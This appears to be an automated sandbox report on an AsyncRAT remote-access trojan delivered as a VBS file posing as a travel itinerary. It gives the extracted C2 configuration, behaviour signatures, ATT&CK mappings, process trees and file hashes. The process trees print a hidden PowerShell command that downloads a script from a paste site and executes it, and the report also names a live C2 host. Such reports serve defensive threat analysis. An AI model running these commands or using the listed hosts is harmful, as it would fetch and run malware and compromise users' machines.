asyncrat | dac02b322f310cdaa789470be4bbf41fa842781a8010c06aaa346f1e87f96b72

Analysis

max time kernel
101s
max time network
143s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21/01/2025, 21:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Round Trip Itinerary details.vbs
Size

780B
MD5

44a1dc576cca328a09abc1747cfc6984
SHA1

30edd4c5e409ed9702b2ae4a5d16c07dde4e873c
SHA256

dac02b322f310cdaa789470be4bbf41fa842781a8010c06aaa346f1e87f96b72
SHA512

af3d479790b667aeb268c5304f2490c8d17c669de48ecb5222c9c6c900f3c289417878af5fd5faca16bb543ae5097ae2073f10d5ea80138ff82aaa246b23e534

Score

10^/10

asyncrat safemode discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

SAFEMODE

BobbyMiller09.bumbleshrimp.com:1987

Mutex

cQWO7Q45k2CY

Attributes

delay
3
install
false
install_file
srtsfsuytrrd.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
4	2444	WScript.exe
19	4252	powershell.exe
53	5052	WScript.exe
58	4012	powershell.exe
60	3304	WScript.exe
61	2636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2104	powershell.exe
4012	powershell.exe
2564	powershell.exe
2636	powershell.exe
116	powershell.exe
4252	powershell.exe
4252	powershell.exe
4012	powershell.exe
2636	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsLocalSystemUpgrade.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsLocalSystemUpgrade.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsLocalSystemUpgrade.js	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2104 set thread context of 3260	2104	powershell.exe	91
PID 2564 set thread context of 4800	2564	powershell.exe	114
PID 116 set thread context of 3832	116	powershell.exe	122

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4252	powershell.exe
4252	powershell.exe
2104	powershell.exe
2104	powershell.exe
4012	powershell.exe
4012	powershell.exe
4012	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
2636	powershell.exe
2636	powershell.exe
116	powershell.exe
116	powershell.exe
116	powershell.exe
116	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	3260	RegAsm.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	116	powershell.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2444 wrote to memory of 4252	2444	WScript.exe	82
PID 2444 wrote to memory of 4252	2444	WScript.exe	82
PID 4252 wrote to memory of 2104	4252	powershell.exe	84
PID 4252 wrote to memory of 2104	4252	powershell.exe	84
PID 2104 wrote to memory of 2448	2104	powershell.exe	89
PID 2104 wrote to memory of 2448	2104	powershell.exe	89
PID 2448 wrote to memory of 4916	2448	csc.exe	90
PID 2448 wrote to memory of 4916	2448	csc.exe	90
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 2104 wrote to memory of 3260	2104	powershell.exe	91
PID 5052 wrote to memory of 4012	5052	WScript.exe	107
PID 5052 wrote to memory of 4012	5052	WScript.exe	107
PID 4012 wrote to memory of 2564	4012	powershell.exe	109
PID 4012 wrote to memory of 2564	4012	powershell.exe	109
PID 2564 wrote to memory of 2156	2564	powershell.exe	110
PID 2564 wrote to memory of 2156	2564	powershell.exe	110
PID 2156 wrote to memory of 1352	2156	csc.exe	111
PID 2156 wrote to memory of 1352	2156	csc.exe	111
PID 2564 wrote to memory of 4176	2564	powershell.exe	112
PID 2564 wrote to memory of 4176	2564	powershell.exe	112
PID 2564 wrote to memory of 4176	2564	powershell.exe	112
PID 2564 wrote to memory of 1284	2564	powershell.exe	113
PID 2564 wrote to memory of 1284	2564	powershell.exe	113
PID 2564 wrote to memory of 1284	2564	powershell.exe	113
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 2564 wrote to memory of 4800	2564	powershell.exe	114
PID 3304 wrote to memory of 2636	3304	WScript.exe	116
PID 3304 wrote to memory of 2636	3304	WScript.exe	116
PID 2636 wrote to memory of 116	2636	powershell.exe	118
PID 2636 wrote to memory of 116	2636	powershell.exe	118
PID 116 wrote to memory of 2572	116	powershell.exe	119
PID 116 wrote to memory of 2572	116	powershell.exe	119
PID 2572 wrote to memory of 4136	2572	csc.exe	120
PID 2572 wrote to memory of 4136	2572	csc.exe	120
PID 116 wrote to memory of 1840	116	powershell.exe	121
PID 116 wrote to memory of 1840	116	powershell.exe	121
PID 116 wrote to memory of 1840	116	powershell.exe	121
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122
PID 116 wrote to memory of 3832	116	powershell.exe	122

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Round Trip Itinerary details.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command Invoke-WebRequest -Uri 'https://www.pastery.net/qjaxzf/raw/' -OutFile 'C:\Users\Public\WindowsLocalSystem.PS1'; PowerShell -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File 'C:\Users\Public\WindowsLocalSystem.PS1'
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Public\WindowsLocalSystem.PS1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uujoxtjz\uujoxtjz.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2448
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA568.tmp" "c:\Users\Admin\AppData\Local\Temp\uujoxtjz\CSC4F93174065004A88BB87B7E71393FEA.TMP"
        5⤵
        
        PID:4916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3260

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Round Trip Itinerary details.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command Invoke-WebRequest -Uri 'https://www.pastery.net/qjaxzf/raw/' -OutFile 'C:\Users\Public\WindowsLocalSystem.PS1'; PowerShell -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File 'C:\Users\Public\WindowsLocalSystem.PS1'
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Public\WindowsLocalSystem.PS1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j3pfkydw\j3pfkydw.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2156
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB89D.tmp" "c:\Users\Admin\AppData\Local\Temp\j3pfkydw\CSC3B048B2E41904F4CB98082340F63651.TMP"
        5⤵
        
        PID:1352
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4176
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1284
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4800

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Round Trip Itinerary details.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command Invoke-WebRequest -Uri 'https://www.pastery.net/qjaxzf/raw/' -OutFile 'C:\Users\Public\WindowsLocalSystem.PS1'; PowerShell -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File 'C:\Users\Public\WindowsLocalSystem.PS1'
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Public\WindowsLocalSystem.PS1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:116
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dybvjkuq\dybvjkuq.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF6E.tmp" "c:\Users\Admin\AppData\Local\Temp\dybvjkuq\CSC75530F08AEE84BF08435D9262B72BA69.TMP"
        5⤵
        
        PID:4136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1840
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
1ead96b48d66e168ea7671f79fb8bd3f

SHA1
9fd7e34a7842975c74e2a5c1f7869468b2ff8853

SHA256
be1107e29cabb18a582430a9aa73f411e9f649f638a5dde06a06dbd8e8ce6526

SHA512
77c1da7736ad67954ad42942cd90fee1bc1831ce8cfa9a688d48264dcb271b6dc849148fce5ce1fe1a5618fb9c93c9b2100f501b17a0f6b8693931fec45ab1da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Filesize
425B

MD5
8c7889bde41724ce3db7c67e730677f6

SHA1
485891cc9120cb2203a2483754dbd5e6ea24f28e

SHA256
83c70bfcb1b41892c9c50cabe9bc2d96b2f7420b28545afabd32f682ac62d0ad

SHA512
b7c3aab27fc924dcaef78987b492931e164b9e30b813c532fe87e1d40001ed1861c4b5ddbdd85cd2278681a22e32eee816877f4f63cecaa9972976d87e38f5cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
334c34a751a74cd85acb4b8c27c47e6c

SHA1
9f44975fb10f3bfcf9b101bd944b71429e8df55c

SHA256
67c60c7d7314121e9582a823f92efec4f4e694393b12339187777d674cf3bf5f

SHA512
2ee53505b4105e22f9c4b4ff9380912d703f676c84cc682b8e2f0f104c9a1420b55decd9ca46db8df76c9a722aa5eb131368b1fec5278c578c21f3ac080941c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
400B

MD5
08d8161d680ec55359cd9e8cfa6e689e

SHA1
6792558830f7592276749549d6f5edbd30b7a48b

SHA256
ce9f984e9af8bb9e93541fc05362d2463530692019516a9cccc4d8c9bfbf14d1

SHA512
f5ed0d04257f757dcf53c825987becd43a5bac0327ed9126f113ec17883b139a6492edb29f9aa522bd0d50ccd285d3a765e1bc4df37a4e69b7efb602d7b0c0c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
670c4920a79e1c12a6c4e8ff4007562b

SHA1
5023e825d4a8af071498411f589f3b25ff335f0f

SHA256
37c4a07c009ffa6061e7ffcec01d0eb2c1a2c7ac94fc3d2208e1bfee6815c92f

SHA512
d717acfd4aea4d2788b06be081c00d97929eadaa97b9144ebc02617837d8c9ffaad30f3bef0a662c560dc2bc98603853af3404120f5ac2430335dda06e7c5bd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
192B

MD5
864cd78b2760faca369b8b1c33157486

SHA1
945bf812308a0fa3b8892bd0c3a54094e7eda09c

SHA256
728eed0dac0b17224b4eee2984b5720ebd266f57c148c25b92154563411a4390

SHA512
d82cf270af1e050e91e11a0ec01b974a88b19316bd03390a8e890fc7da819718fef2e2306dc55883a093b1723676139999ede72a872347276c1f3dde1e54a690

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA568.tmp

Filesize
1KB

MD5
4a9a8da417bd5ea796f8ae77a26a42bd

SHA1
13798c8e6d5f53b0ee96cc384b485f97fa430007

SHA256
43c269d0438f7fca5a360f9e1b949520579b127e35d15d40f8eb308c140b4b58

SHA512
63ed7fe3db6ae6e5ed5b81c1044d2f17bc06b2df45b0e1db8a62e8f9050580fea0349ed3d2b86eb63820bb57f358aee398519618ee5f448113d0736aee62f613

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB89D.tmp

Filesize
1KB

MD5
aee086b7684efa574417340f62abe5a6

SHA1
25a905e6ec5b7762e699b080aaea0a3729da457a

SHA256
3c3464e01bdaaad5f55bf37d41197f811c121c51372fa101d24d913aa971b05e

SHA512
304788be41519ee7a59b3cd799d4f40ff6e294b2ca1fc842bd19c5902ad65833890cd591760b5893867fa4643ec15df192b9a4141ba8287d890228bcb83dae63

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDF6E.tmp

Filesize
1KB

MD5
314dbdca937861b10503ca806686847a

SHA1
77522362bf8f6b2c92add39e9d39bdcc1e308b21

SHA256
18d9c41d9d0144f2c1f3bf39d0677b486df5eb57ef1d5110e970d4140d1b6778

SHA512
487e97394b93dfc147e6c31ac641d5d4ed9730fdad1f53f7b7b3a445ca6372d7558b723ee1de121868017d76cf50bba858073feb808a8b113b9c186b6065b81a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sqssqelx.bur.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dybvjkuq\dybvjkuq.dll

Filesize
8KB

MD5
5a6e21a7c86066b02e257a5ac20a8d17

SHA1
6a3778b6b0d9654893ba4383d140530f3dcc5b2b

SHA256
aa43fb581f3f62e469117a5fda6a92ff633b153a5b9290c714c9aa11f92247f0

SHA512
4b907d230e6aebcd9950505851dc8fde30cc412ea160ec69a38f0a79b0e945a7d8d7b199ae1e264a220888c26a32707847f73f9057cf060c465bbc9aa555390b

Download Submit
C:\Users\Admin\AppData\Local\Temp\j3pfkydw\j3pfkydw.dll

Filesize
8KB

MD5
b7f54acf94bf06d64da2335249be4139

SHA1
2b7f2fe0d39e5df465756abf27672eb4eaf5d811

SHA256
1263f07fde6a9575fcb33282579b5dda25c9b05586150070b86e19faf9fc59f1

SHA512
38eabbfc80c70cc143682570f08e53a23e4c5314fc00ed1a2d40536f36aa4c136eedae83d05ec1a45bf3375c8eb8220ef92e0840b34c9719ffb602cb75c6e37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\uujoxtjz\uujoxtjz.dll

Filesize
8KB

MD5
36109689d8a79e0c057e47a3a42197c3

SHA1
9a7b0aabc031bee555c2428ade868bbc19466848

SHA256
0a0248987e9657e41a193fdcdf857e51a0b89647505af7c183b5db40bb90e167

SHA512
62ef50251b56386a12bfde51384f76557933d11d6bae2b80ec36096ba51a5e8a6cccb17a7856a1bb1c027575bc0f4950188f010c04061953ef4dfdf338f1d9ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsLocalSystemUpgrade.js

Filesize
177B

MD5
c938545992c98fe0952df47dc4146e0e

SHA1
86b2e315d6d16f09a6f5fd4602740f7db5df06ce

SHA256
22768c642db617def4704567856ad5ecbd6c00e5c56448273902b7884577db02

SHA512
d861d2608a22224a856bd62d6049abe1e1ff3496eba4b63095ada08d314ce348ac9df2fe60de6ee8220e7e0b4612cb6e458a85e770169f444c8ce2a76228ceb4

Download Submit
C:\Users\Public\WindowsLocalSystem.PS1

Filesize
64KB

MD5
7cfe3768daedf2504400604ebc508423

SHA1
10b4491291d4667412600ba58ce31453236c167c

SHA256
12a7a72f46df5f631460ed2681cbfa18e19d3c3fdfae96fe8d44cb130dbbc84c

SHA512
4a3a35bb4900e35d3b3029eb553621856f779db9aec10305b0dff0287feb59493aa56ce5eb26e62b3714408d40cffaf7806c29eef479d687c216c962801e0cfa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dybvjkuq\CSC75530F08AEE84BF08435D9262B72BA69.TMP

Filesize
652B

MD5
3b07e6521fbc56da819d85129fb31844

SHA1
8ea8a4e2b21b84bee16dc166e2cdafca00615e2b

SHA256
f34da35df4cae942f1f568b759ed8c81959a90f748aec5c54bbb30934d1b24a9

SHA512
caaf799350963df3b1b305ff42c4f36eb1ca10e4f4ff81f17776f2debf2e5a2f21b7035f85a1fff92c1674d69fd12686b7d31b9b94697673217c3da2a3599753

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dybvjkuq\dybvjkuq.cmdline

Filesize
327B

MD5
651cf20a70f32c02fc9a5ff2ae96c60a

SHA1
fb1445e7e42c988e03d690b6c9a9d5d62cacfafd

SHA256
5497deea7646cafb113d9f0bd789dd9817d792ccc72ba55d29b45bde8d7a22b6

SHA512
5e4fac5d81e1c7d0cd9dc6abbfeef8076c324432d7a6afe5af1a44d1ad4c20c389354f5d915628301b34d0855cd008fcb5c467b2c24cea4b407133db133d1d89

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j3pfkydw\CSC3B048B2E41904F4CB98082340F63651.TMP

Filesize
652B

MD5
21f6bb8c6bf2b25e049b6fca101ce6b0

SHA1
65edaa4f4e997e0524a988ba1eb245755c85c89e

SHA256
7833a9af837cade118d8bee45a91b3b9982f5c8b9110ce383aef3a654d3e3036

SHA512
99066493343bdfde688811f0f67c6f0a88db9fa3385e0b86868d34fec48619da88c5e597683d7ef1947a9f8d174fd058c8791e2ea3e7510d56b2f881247baa2b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j3pfkydw\j3pfkydw.cmdline

Filesize
327B

MD5
0c056b0d5fd3b400852a387e561abde8

SHA1
7dee5ae1591e7d85f861c948687f9856a0541f67

SHA256
6911d71716ae41f0558663fc81bfbb1c3d4b0cb45ffcee985b7b0879e7824e1e

SHA512
a5cd3877a4b1caaf89188d754937c87294e844a67ae70f2456eea29a795e872633491675f2261be0c7e7f918aeda03febba422283512d78ee944647ef4584e83

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uujoxtjz\CSC4F93174065004A88BB87B7E71393FEA.TMP

Filesize
652B

MD5
65fbc690e7fadd25746cb253e30fce93

SHA1
0d96d007df52295244694d2d2d808ec25f3ce685

SHA256
fa8a7b767d7ad876e14288c85062be6e109c4516ffde8b875ca453c663912101

SHA512
993e2b0c02116512998f57a1e973dba8d2f9bbef9bd62cc94173fd8eee45f46ed851aac4cc838d9d951f13299e972923d15b774c95f426e3ee9cc466613a6ad7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uujoxtjz\uujoxtjz.0.cs

Filesize
10KB

MD5
09035af4e642b0b7a269c87cfcac0ad9

SHA1
b7dc64c7523dcc3361ab7ae770460f8428a91e1a

SHA256
27120c8ed3bd26c821ca413a54a6d5d536ada661eab1abe1c5255ae5a16a27ee

SHA512
d1bb5ce5d7d74db101db7360c9b3ada3187c8d6d26456c959d68da45bf99130ac676a1b71eec4881cd045629ac371435ef9f4cac5430614b5f9b4067ef2604f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uujoxtjz\uujoxtjz.cmdline

Filesize
327B

MD5
b3f7b76c100a736f4122dc818942491f

SHA1
94db60359fcb3d58818fbe3b821c16b263b45114

SHA256
9aba617183b037ec4665187f8e608dab0c8691381ab9686205b13cf33dd3cb5d

SHA512
0a1208cd935091c30d5a51601516943a4d3f2d4523a298351f1ec457e2b316a6905640c59713ecbc1acefa22dc11d003e191e7250ef22c4ac8a7bf0bede27703

Download Submit
memory/116-131-0x000001EEADDF0000-0x000001EEADDF8000-memory.dmp

Filesize
32KB

Download
memory/2104-40-0x0000019376B60000-0x0000019376B68000-memory.dmp

Filesize
32KB

Download
memory/2104-26-0x00000193798B0000-0x0000019379DD8000-memory.dmp

Filesize
5.2MB

Download
memory/2104-25-0x0000019379300000-0x0000019379376000-memory.dmp

Filesize
472KB

Download
memory/2564-89-0x000002A2DBC60000-0x000002A2DBC68000-memory.dmp

Filesize
32KB

Download
memory/3260-53-0x0000000005320000-0x0000000005386000-memory.dmp

Filesize
408KB

Download
memory/3260-52-0x0000000005D30000-0x00000000062D6000-memory.dmp

Filesize
5.6MB

Download
memory/3260-51-0x00000000056E0000-0x000000000577C000-memory.dmp

Filesize
624KB

Download
memory/3260-42-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4252-0-0x00007FF991963000-0x00007FF991965000-memory.dmp

Filesize
8KB

Download
memory/4252-48-0x00007FF991960000-0x00007FF992422000-memory.dmp

Filesize
10.8MB

Download
memory/4252-13-0x00007FF991960000-0x00007FF992422000-memory.dmp

Filesize
10.8MB

Download
memory/4252-12-0x00007FF991960000-0x00007FF992422000-memory.dmp

Filesize
10.8MB

Download
memory/4252-11-0x00007FF991960000-0x00007FF992422000-memory.dmp

Filesize
10.8MB

Download
memory/4252-1-0x0000019FF9510000-0x0000019FF9532000-memory.dmp

Filesize
136KB

Download